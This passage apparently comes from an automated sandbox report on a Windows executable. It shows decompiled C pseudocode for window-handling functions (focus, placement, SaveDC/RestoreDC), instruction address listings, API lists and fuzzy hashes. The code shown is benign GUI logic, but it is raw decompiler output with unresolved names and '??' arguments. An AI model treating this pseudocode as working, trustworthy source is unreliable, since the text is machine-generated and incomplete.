                                                                                0x00449545
                                                                                0x0044954d
                                                                                0x00449554
                                                                                0x00449554
                                                                                0x0044945e
                                                                                0x0044945e
                                                                                0x0044945f
                                                                                0x004498c8
                                                                                0x004498c9
                                                                                0x004498cb
                                                                                0x00000000
                                                                                0x004498cd
                                                                                0x004498cd
                                                                                0x004498ce
                                                                                0x004498ce
                                                                                0x004498d0
                                                                                0x004498da
                                                                                0x004498e2
                                                                                0x004498e5
                                                                                0x004498e8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004498f2
                                                                                0x004498f7
                                                                                0x004498f9
                                                                                0x00449907
                                                                                0x00449908
                                                                                0x00449908
                                                                                0x00449909
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004498f9
                                                                                0x00449900
                                                                                0x00449900
                                                                                0x00449465
                                                                                0x00000000
                                                                                0x00449465
                                                                                0x0044945f
                                                                                0x0044945c
                                                                                0x00000000
                                                                                0x00449432
                                                                                0x00449432
                                                                                0x00449470
                                                                                0x00449471
                                                                                0x00449473
                                                                                0x00000000
                                                                                0x00449479
                                                                                0x00449479
                                                                                0x0044947a
                                                                                0x0044947a
                                                                                0x0044947c
                                                                                0x00449481
                                                                                0x0044948a
                                                                                0x0044948f
                                                                                0x00449491
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00449497
                                                                                0x00449498
                                                                                0x00449498
                                                                                0x00449499
                                                                                0x00000000
                                                                                0x0044949b
                                                                                0x00000000
                                                                                0x0044949b
                                                                                0x00000000
                                                                                0x00449499
                                                                                0x0044947c
                                                                                0x00000000
                                                                                0x00449434
                                                                                0x00449434
                                                                                0x00449437
                                                                                0x0044967a
                                                                                0x00449683
                                                                                0x00449684
                                                                                0x00449686
                                                                                0x00000000
                                                                                0x0044968c
                                                                                0x0044968c
                                                                                0x0044968d
                                                                                0x0044968d
                                                                                0x0044968f
                                                                                0x004496a6
                                                                                0x004496a9
                                                                                0x004496ad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00449775
                                                                                0x00449776
                                                                                0x00449776
                                                                                0x00449777
                                                                                0x00000000
                                                                                0x0044977d
                                                                                0x00000000
                                                                                0x0044977d
                                                                                0x00000000
                                                                                0x00449777
                                                                                0x004496bf
                                                                                0x004496c4
                                                                                0x004496c5
                                                                                0x004496ca
                                                                                0x004496cd
                                                                                0x004496dc
                                                                                0x004496e1
                                                                                0x004496e2
                                                                                0x004496e7
                                                                                0x004496ea
                                                                                0x004496f6
                                                                                0x0044970b
                                                                                0x00449724
                                                                                0x0044972b
                                                                                0x0044972e
                                                                                0x00449731
                                                                                0x00449736
                                                                                0x0044973b
                                                                                0x00449750
                                                                                0x00449750
                                                                                0x0044943d
                                                                                0x0044943d
                                                                                0x0044943e
                                                                                0x00449785
                                                                                0x0044978e
                                                                                0x0044978f
                                                                                0x00449791
                                                                                0x00000000
                                                                                0x00449797
                                                                                0x00449797
                                                                                0x00449798
                                                                                0x00449798
                                                                                0x0044979a
                                                                                0x004497b1
                                                                                0x004497b4
                                                                                0x004497b8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004498b8
                                                                                0x004498b9
                                                                                0x004498b9
                                                                                0x004498ba
                                                                                0x00000000
                                                                                0x004498c0
                                                                                0x00000000
                                                                                0x004498c0
                                                                                0x00000000
                                                                                0x004498ba
                                                                                0x004497ca
                                                                                0x004497d8
                                                                                0x004497e7
                                                                                0x004497f5
                                                                                0x00449801
                                                                                0x0044980f
                                                                                0x00449818
                                                                                0x0044982d
                                                                                0x00449847
                                                                                0x0044984c
                                                                                0x0044984f
                                                                                0x00449852
                                                                                0x00449857
                                                                                0x0044985c
                                                                                0x0044986e
                                                                                0x0044986e
                                                                                0x00449444
                                                                                0x00449447
                                                                                0x00449578
                                                                                0x00449581
                                                                                0x00449582
                                                                                0x00449584
                                                                                0x00000000
                                                                                0x0044958a
                                                                                0x0044958a
                                                                                0x0044958b
                                                                                0x0044958b
                                                                                0x0044958d
                                                                                0x00449599
                                                                                0x0044959c
                                                                                0x0044959f
                                                                                0x004495a2
                                                                                0x004495cd
                                                                                0x004495a4
                                                                                0x004495b1
                                                                                0x004495b1
                                                                                0x004495d0
                                                                                0x004495d4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0044966a
                                                                                0x0044966b
                                                                                0x0044966b
                                                                                0x0044966c
                                                                                0x00000000
                                                                                0x00449672
                                                                                0x00000000
                                                                                0x00449672
                                                                                0x00000000
                                                                                0x0044966c
                                                                                0x004495ec
                                                                                0x004495f1
                                                                                0x004495f3
                                                                                0x004495fa
                                                                                0x00449605
                                                                                0x00449607
                                                                                0x00449607
                                                                                0x0044960c
                                                                                0x00449614
                                                                                0x00449617
                                                                                0x00449619
                                                                                0x0044961f
                                                                                0x00449621
                                                                                0x00449628
                                                                                0x00449628
                                                                                0x0044962e
                                                                                0x00449634
                                                                                0x0044963b
                                                                                0x00449657
                                                                                0x00449660
                                                                                0x0044963d
                                                                                0x0044964d
                                                                                0x0044964d
                                                                                0x0044963b
                                                                                0x00449619
                                                                                0x0044944d
                                                                                0x0044990b
                                                                                0x0044990e
                                                                                0x00449912
                                                                                0x00449915
                                                                                0x00449919
                                                                                0x0044991c
                                                                                0x0044991d
                                                                                0x00449922
                                                                                0x00449922
                                                                                0x00449925
                                                                                0x00449927
                                                                                0x0044992a
                                                                                0x0044992d
                                                                                0x0044993a
                                                                                0x0044993a
                                                                                0x0044943e
                                                                                0x00449437
                                                                                0x00449432
                                                                                0x00000000

                                                                                APIs
                                                                                • SaveDC.GDI32(?), ref: 004496D7
                                                                                • RestoreDC.GDI32(?,?), ref: 0044974B
                                                                                • GetWindowDC.USER32(?,00000000,0044993B), ref: 004497C5
                                                                                • SaveDC.GDI32(?), ref: 004497FC
                                                                                • RestoreDC.GDI32(?,?), ref: 00449869
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044993B), ref: 0044991D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: RestoreSaveWindow$NtdllProc_
                                                                                • String ID:
                                                                                • API String ID: 1346906915-0
                                                                                • Opcode ID: 0b1900351f85a184ba78c5dddc9478e356d8c181e3ef901b2ea70d3ad8dc3fd5
                                                                                • Instruction ID: a45c3f59b09cd28d2ba5bdec491db0630d48655138bc4fa014f9cd7e6cd3b5ed
                                                                                • Opcode Fuzzy Hash: 0b1900351f85a184ba78c5dddc9478e356d8c181e3ef901b2ea70d3ad8dc3fd5
                                                                                • Instruction Fuzzy Hash: BFE16E74A046099FEB10DF6AC48199FF3F5FF89304B2185AAE815A7325C738ED42DB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0044EEEC, Relevance: 9.3, APIs: 6, Instructions: 284windowCOMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 91%
                                                                                			E0044EEEC(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				int _v12;
				intOrPtr _v16;
				struct HDC__* _v20;
				intOrPtr* _v24;
				void* __ebp;
				intOrPtr _t92;
				struct HWND__* _t93;
				struct HWND__* _t96;
				intOrPtr _t116;
				intOrPtr _t119;
				struct HWND__* _t125;
				struct HWND__* _t128;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t136;
				struct HWND__* _t138;
				struct HWND__* _t141;
				void* _t145;
				intOrPtr _t148;
				intOrPtr _t179;
				intOrPtr* _t208;
				intOrPtr _t233;
				intOrPtr _t239;
				intOrPtr _t246;
				struct HWND__* _t250;
				struct HWND__* _t251;
				struct HWND__* _t256;
				intOrPtr* _t257;
				void* _t259;
				void* _t261;
				intOrPtr _t262;
				void* _t264;
				void* _t268;

				_t259 = _t261;
				_t262 = _t261 + 0xffffffec;
				_t208 = __edx;
				_v8 = __eax;
				_t92 =  *__edx;
				_t264 = _t92 - 0x46;
				if(_t264 > 0) {
					_t93 = _t92 - 0xb01a;
					__eflags = _t93;
					if(_t93 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E004037B0(_v8, __eflags);
						}
					} else {
						__eflags = _t93 == 1;
						if(_t93 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E004037B0(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t264 == 0) {
						_t116 = _v8;
						_t233 =  *0x44f31c; // 0x1
						__eflags = _t233 - ( *(_t116 + 0x1c) &  *0x44f318);
						if(_t233 == ( *(_t116 + 0x1c) &  *0x44f318)) {
							_t119 = _v8;
							__eflags =  *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff < 0) {
								_t132 = _v8;
								__eflags =  *((char*)(_t132 + 0x22b)) - 2;
								if( *((char*)(_t132 + 0x22b)) != 2) {
									_t133 =  *((intOrPtr*)(__edx + 8));
									_t26 = _t133 + 0x18;
									 *_t26 =  *(_t133 + 0x18) | 0x00000002;
									__eflags =  *_t26;
								}
							}
							_t125 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t125;
							if(_t125 == 0) {
								L30:
								_t128 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t128;
								if(_t128 == 0) {
									L32:
									 *( *((intOrPtr*)(_t208 + 8)) + 0x18) =  *( *((intOrPtr*)(_t208 + 8)) + 0x18) | 0x00000001;
								} else {
									__eflags = _t128 == 3;
									if(_t128 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t125 == 2;
								if(_t125 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t96 = _t92 + 0xfffffffa - 3;
						if(_t96 < 0) {
							__eflags =  *0x46bb18;
							if( *0x46bb18 != 0) {
								__eflags =  *__edx - 7;
								if( *__edx != 7) {
									goto L43;
								} else {
									_t135 = _v8;
									__eflags =  *(_t135 + 0x1c) & 0x00000010;
									if(( *(_t135 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_t256 = 0;
										_t136 = _v8;
										__eflags =  *((char*)(_t136 + 0x22f)) - 2;
										if( *((char*)(_t136 + 0x22f)) != 2) {
											_t138 =  *(_v8 + 0x220);
											__eflags = _t138;
											if(_t138 != 0) {
												__eflags = _t138 - _v8;
												if(_t138 != _v8) {
													_t256 = E0043BD14(_t138);
												}
											}
										} else {
											_t141 = E0044F74C(_v8);
											__eflags = _t141;
											if(_t141 != 0) {
												_t256 = E0043BD14(E0044F74C(_v8));
											}
										}
										__eflags = _t256;
										if(_t256 == 0) {
											goto L43;
										} else {
											_t96 = SetFocus(_t256);
										}
									}
								}
							}
							goto L44;
						} else {
							_t145 = _t96 - 0x22;
							if(_t145 == 0) {
								_v24 =  *((intOrPtr*)(__edx + 8));
								__eflags =  *_v24 - 1;
								if( *_v24 != 1) {
									goto L43;
								} else {
									_t148 = _v8;
									__eflags =  *(_t148 + 0x248);
									if( *(_t148 + 0x248) == 0) {
										goto L43;
									} else {
										_t250 = E004486F8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
										__eflags = _t250;
										if(_t250 == 0) {
											goto L43;
										} else {
											_v16 = E0041F488(0, 1);
											_push(_t259);
											_push(0x44f162);
											_push( *[fs:eax]);
											 *[fs:eax] = _t262;
											_v12 = SaveDC( *(_v24 + 0x18));
											_push(_t259);
											_push(0x44f145);
											_push( *[fs:eax]);
											 *[fs:eax] = _t262;
											E0041FE44(_v16,  *(_v24 + 0x18));
											E0041FCC0(_v16);
											E00449BE0(_t250, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
											_pop(_t239);
											 *[fs:eax] = _t239;
											_push(0x44f14c);
											__eflags = 0;
											E0041FE44(_v16, 0);
											return RestoreDC( *(_v24 + 0x18), _v12);
										}
									}
								}
							} else {
								if(_t145 == 1) {
									_t257 =  *((intOrPtr*)(__edx + 8));
									__eflags =  *_t257 - 1;
									if( *_t257 != 1) {
										goto L43;
									} else {
										_t179 = _v8;
										__eflags =  *(_t179 + 0x248);
										if( *(_t179 + 0x248) == 0) {
											goto L43;
										} else {
											_t251 = E004486F8( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t257 + 8)));
											__eflags = _t251;
											if(_t251 == 0) {
												goto L43;
											} else {
												_v20 = GetWindowDC(E0043BD14(_v8));
												 *[fs:eax] = _t262;
												_v16 = E0041F488(0, 1);
												 *[fs:eax] = _t262;
												_v12 = SaveDC(_v20);
												 *[fs:eax] = _t262;
												E0041FE44(_v16, _v20);
												E0041FCC0(_v16);
												 *((intOrPtr*)(_t251->i + 0x38))(_t257 + 0x10,  *[fs:eax], 0x44f24c, _t259,  *[fs:eax], 0x44f269, _t259,  *[fs:eax], 0x44f290, _t259);
												_pop(_t246);
												 *[fs:eax] = _t246;
												_push(0x44f253);
												__eflags = 0;
												E0041FE44(_v16, 0);
												return RestoreDC(_v20, _v12);
											}
										}
									}
								} else {
									L41:
									_t268 =  *_t208 -  *0x487c08; // 0xc075
									if(_t268 == 0) {
										E00436848(_v8, 0, 0xb025, 0);
										E00436848(_v8, 0, 0xb024, 0);
										E00436848(_v8, 0, 0xb035, 0);
										E00436848(_v8, 0, 0xb009, 0);
										E00436848(_v8, 0, 0xb008, 0);
										E00436848(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t96 = E004397C4(_v8, _t208);
									L44:
									return _t96;
								}
							}
						}
					}
				}
			}






































                                                                                0x0044eeed
                                                                                0x0044eeef
                                                                                0x0044eef5
                                                                                0x0044eef7
                                                                                0x0044eefa
                                                                                0x0044eefc
                                                                                0x0044eeff
                                                                                0x0044ef24
                                                                                0x0044ef24
                                                                                0x0044ef29
                                                                                0x0044efd5
                                                                                0x0044efdc
                                                                                0x0044efe9
                                                                                0x0044efe9
                                                                                0x0044ef2f
                                                                                0x0044ef2f
                                                                                0x0044ef30
                                                                                0x0044efb4
                                                                                0x0044efbb
                                                                                0x0044efc8
                                                                                0x0044efc8
                                                                                0x0044ef32
                                                                                0x00000000
                                                                                0x0044ef32
                                                                                0x0044ef30
                                                                                0x00000000
                                                                                0x0044ef01
                                                                                0x0044ef01
                                                                                0x0044eff3
                                                                                0x0044f001
                                                                                0x0044f008
                                                                                0x0044f00b
                                                                                0x0044f011
                                                                                0x0044f01b
                                                                                0x0044f01d
                                                                                0x0044f01f
                                                                                0x0044f022
                                                                                0x0044f029
                                                                                0x0044f02b
                                                                                0x0044f02e
                                                                                0x0044f02e
                                                                                0x0044f02e
                                                                                0x0044f02e
                                                                                0x0044f029
                                                                                0x0044f03b
                                                                                0x0044f03b
                                                                                0x0044f03d
                                                                                0x0044f047
                                                                                0x0044f050
                                                                                0x0044f050
                                                                                0x0044f052
                                                                                0x0044f05c
                                                                                0x0044f05f
                                                                                0x0044f054
                                                                                0x0044f054
                                                                                0x0044f056
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0044f056
                                                                                0x0044f03f
                                                                                0x0044f03f
                                                                                0x0044f041
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0044f041
                                                                                0x0044f03d
                                                                                0x00000000
                                                                                0x0044ef07
                                                                                0x0044ef0a
                                                                                0x0044ef0d
                                                                                0x0044ef37
                                                                                0x0044ef3e
                                                                                0x0044ef44
                                                                                0x0044ef47
                                                                                0x00000000
                                                                                0x0044ef4d
                                                                                0x0044ef4d
                                                                                0x0044ef50
                                                                                0x0044ef54
                                                                                0x00000000
                                                                                0x0044ef5a
                                                                                0x0044ef5a
                                                                                0x0044ef5c
                                                                                0x0044ef5f
                                                                                0x0044ef66
                                                                                0x0044ef88
                                                                                0x0044ef8e
                                                                                0x0044ef90
                                                                                0x0044ef92
                                                                                0x0044ef95
                                                                                0x0044ef9c
                                                                                0x0044ef9c
                                                                                0x0044ef95
                                                                                0x0044ef68
                                                                                0x0044ef6b
                                                                                0x0044ef70
                                                                                0x0044ef72
                                                                                0x0044ef81
                                                                                0x0044ef81
                                                                                0x0044ef72
                                                                                0x0044ef9e
                                                                                0x0044efa0
                                                                                0x00000000
                                                                                0x0044efa6
                                                                                0x0044efa7
                                                                                0x0044efa7
                                                                                0x0044efa0
                                                                                0x0044ef54
                                                                                0x0044ef47
                                                                                0x00000000
                                                                                0x0044ef0f
                                                                                0x0044ef0f
                                                                                0x0044ef12
                                                                                0x0044f06b
                                                                                0x0044f071
                                                                                0x0044f074
                                                                                0x00000000
                                                                                0x0044f07a
                                                                                0x0044f07a
                                                                                0x0044f07d
                                                                                0x0044f084
                                                                                0x00000000
                                                                                0x0044f08a
                                                                                0x0044f0a0
                                                                                0x0044f0a2
                                                                                0x0044f0a4
                                                                                0x00000000
                                                                                0x0044f0aa
                                                                                0x0044f0b6
                                                                                0x0044f0bb
                                                                                0x0044f0bc
                                                                                0x0044f0c1
                                                                                0x0044f0c4
                                                                                0x0044f0d3
                                                                                0x0044f0d8
                                                                                0x0044f0d9
                                                                                0x0044f0de
                                                                                0x0044f0e1
                                                                                0x0044f0ed
                                                                                0x0044f100
                                                                                0x0044f118
                                                                                0x0044f11f
                                                                                0x0044f122
                                                                                0x0044f125
                                                                                0x0044f12a
                                                                                0x0044f12f
                                                                                0x0044f144
                                                                                0x0044f144
                                                                                0x0044f0a4
                                                                                0x0044f084
                                                                                0x0044ef18
                                                                                0x0044ef19
                                                                                0x0044f169
                                                                                0x0044f16c
                                                                                0x0044f16f
                                                                                0x00000000
                                                                                0x0044f175
                                                                                0x0044f175
                                                                                0x0044f178
                                                                                0x0044f17f
                                                                                0x00000000
                                                                                0x0044f185
                                                                                0x0044f198
                                                                                0x0044f19a
                                                                                0x0044f19c
                                                                                0x00000000
                                                                                0x0044f1a2
                                                                                0x0044f1b0
                                                                                0x0044f1be
                                                                                0x0044f1cd
                                                                                0x0044f1db
                                                                                0x0044f1e7
                                                                                0x0044f1f5
                                                                                0x0044f1fe
                                                                                0x0044f211
                                                                                0x0044f224
                                                                                0x0044f229
                                                                                0x0044f22c
                                                                                0x0044f22f
                                                                                0x0044f234
                                                                                0x0044f239
                                                                                0x0044f24b
                                                                                0x0044f24b
                                                                                0x0044f19c
                                                                                0x0044f17f
                                                                                0x0044ef1f
                                                                                0x0044f297
                                                                                0x0044f299
                                                                                0x0044f29f
                                                                                0x0044f2ad
                                                                                0x0044f2be
                                                                                0x0044f2cf
                                                                                0x0044f2e0
                                                                                0x0044f2f1
                                                                                0x0044f302
                                                                                0x0044f302
                                                                                0x0044f307
                                                                                0x0044f30c
                                                                                0x0044f311
                                                                                0x0044f317
                                                                                0x0044f317
                                                                                0x0044ef19
                                                                                0x0044ef12
                                                                                0x0044ef0d
                                                                                0x0044ef01

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: RestoreSave$FocusWindow
                                                                                • String ID:
                                                                                • API String ID: 1553564791-0
                                                                                • Opcode ID: 6b41af5913703375e0a362bc73f302330ebe9d2fbdb197f7ec42080e0b416675
                                                                                • Instruction ID: 1e439a01ec3daa42eb792b9dfe2fd44ac08b08da1caa0c646f1805c946d7d8a3
                                                                                • Opcode Fuzzy Hash: 6b41af5913703375e0a362bc73f302330ebe9d2fbdb197f7ec42080e0b416675
                                                                                • Instruction Fuzzy Hash: BDB16F34A00104EFEB11DF69C586AAEB7F5EB09304F6544BAE804D7761CB38EE45CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00455044, Relevance: 9.1, APIs: 6, Instructions: 86windownativeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E00455044(void* __eax) {
				struct HWND__* _t21;
				intOrPtr* _t26;
				signed int _t29;
				intOrPtr* _t30;
				int _t33;
				intOrPtr _t36;
				void* _t51;
				int _t60;

				_t51 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 != 0) {
					SetActiveWindow( *(_t51 + 0x30));
					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
						L6:
						E0045403C( *(_t51 + 0x30), 9, __eflags);
					} else {
						_t60 = IsWindowEnabled(E0043BD14( *((intOrPtr*)(_t51 + 0x44))));
						if(_t60 == 0) {
							goto L6;
						} else {
							_push(0);
							_push(0xf120);
							_push(0x112);
							_push( *(_t51 + 0x30));
							L00406CF8();
						}
					}
					_t26 =  *0x486b30; // 0x487a94
					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					_t30 =  *0x486b30; // 0x487a94
					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
					if(_t60 < 0) {
						asm("adc eax, 0x0");
					}
					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
					_t36 =  *((intOrPtr*)(_t51 + 0x44));
					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
						E0044FDF4(_t36, 0);
						E004521CC( *((intOrPtr*)(_t51 + 0x44)));
					}
					E004546B8(_t51);
					_t21 =  *0x487c00; // 0x22e0f1c
					_t55 =  *((intOrPtr*)(_t21 + 0x64));
					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
						_t21 = SetFocus(E0043BD14(_t55));
					}
					if( *((short*)(_t51 + 0x10a)) != 0) {
						return  *((intOrPtr*)(_t51 + 0x108))();
					}
				}
				return _t21;
			}











                                                                                0x00455046
                                                                                0x0045504c
                                                                                0x00455053
                                                                                0x0045505d
                                                                                0x00455066
                                                                                0x004550a0
                                                                                0x004550a8
                                                                                0x00455077
                                                                                0x00455085
                                                                                0x00455087
                                                                                0x00000000
                                                                                0x00455089
                                                                                0x00455089
                                                                                0x0045508b
                                                                                0x00455090
                                                                                0x00455098
                                                                                0x00455099
                                                                                0x00455099
                                                                                0x00455087
                                                                                0x004550b5
                                                                                0x004550be
                                                                                0x004550c0
                                                                                0x004550c2
                                                                                0x004550c2
                                                                                0x004550c8
                                                                                0x004550d1
                                                                                0x004550d3
                                                                                0x004550d5
                                                                                0x004550d5
                                                                                0x004550df
                                                                                0x004550e4
                                                                                0x004550e9
                                                                                0x004550fc
                                                                                0x00455104
                                                                                0x00455104
                                                                                0x0045510b
                                                                                0x00455110
                                                                                0x00455115
                                                                                0x0045511a
                                                                                0x00455124
                                                                                0x00455124
                                                                                0x00455131
                                                                                0x00000000
                                                                                0x0045513b
                                                                                0x00455131
                                                                                0x00455143

                                                                                APIs
                                                                                • IsIconic.USER32 ref: 0045504C
                                                                                • SetActiveWindow.USER32(?,?,?,?,00454A8E,00000000,00454F30), ref: 0045505D
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00455080
                                                                                • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00454A8E,00000000,00454F30), ref: 00455099
                                                                                • SetWindowPos.USER32(?,00000000,00000000,?,?,00454A8E,00000000,00454F30), ref: 004550DF
                                                                                • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00454A8E,00000000,00454F30), ref: 00455124
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                                                • String ID:
                                                                                • API String ID: 3996302123-0
                                                                                • Opcode ID: 3e24377e9a3bc96d186b145c4c3e7dc99e38ca641a882c360a761ee1e25ff0b8
                                                                                • Instruction ID: 44efac11194c49bad489fcaca8109da60455352909604ac3486cada3038b8842
                                                                                • Opcode Fuzzy Hash: 3e24377e9a3bc96d186b145c4c3e7dc99e38ca641a882c360a761ee1e25ff0b8
                                                                                • Instruction Fuzzy Hash: 01313070B006009BEB20AB69CD95B6A3798AF44709F58146AFE00DF3D7D67CEC888759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043B740, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E0043B740(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E0043C018(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E0043C018(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E00435040(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E00434CF4(_t52);
						return E004037B0(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}












                                                                                0x0043b749
                                                                                0x0043b74b
                                                                                0x0043b74d
                                                                                0x0043b752
                                                                                0x0043b76d
                                                                                0x0043b776
                                                                                0x0043b7a4
                                                                                0x0043b7a4
                                                                                0x0043b7a7
                                                                                0x0043b7ad
                                                                                0x0043b7b3
                                                                                0x0043b7b8
                                                                                0x0043b7bd
                                                                                0x0043b7bf
                                                                                0x0043b7c1
                                                                                0x0043b7d3
                                                                                0x0043b7dd
                                                                                0x0043b7e8
                                                                                0x0043b7e9
                                                                                0x0043b7ea
                                                                                0x0043b7eb
                                                                                0x0043b7f7
                                                                                0x0043b7f7
                                                                                0x0043b7fc
                                                                                0x0043b7fe
                                                                                0x00000000
                                                                                0x0043b809
                                                                                0x0043b77f
                                                                                0x0043b784
                                                                                0x0043b786
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0043b79d
                                                                                0x00000000
                                                                                0x0043b761
                                                                                0x0043b761
                                                                                0x0043b767
                                                                                0x0043b814
                                                                                0x0043b814
                                                                                0x00000000
                                                                                0x0043b767

                                                                                APIs
                                                                                • IsIconic.USER32 ref: 0043B77F
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043B79D
                                                                                • GetWindowPlacement.USER32(?,0000002C), ref: 0043B7D3
                                                                                • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0043B7F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
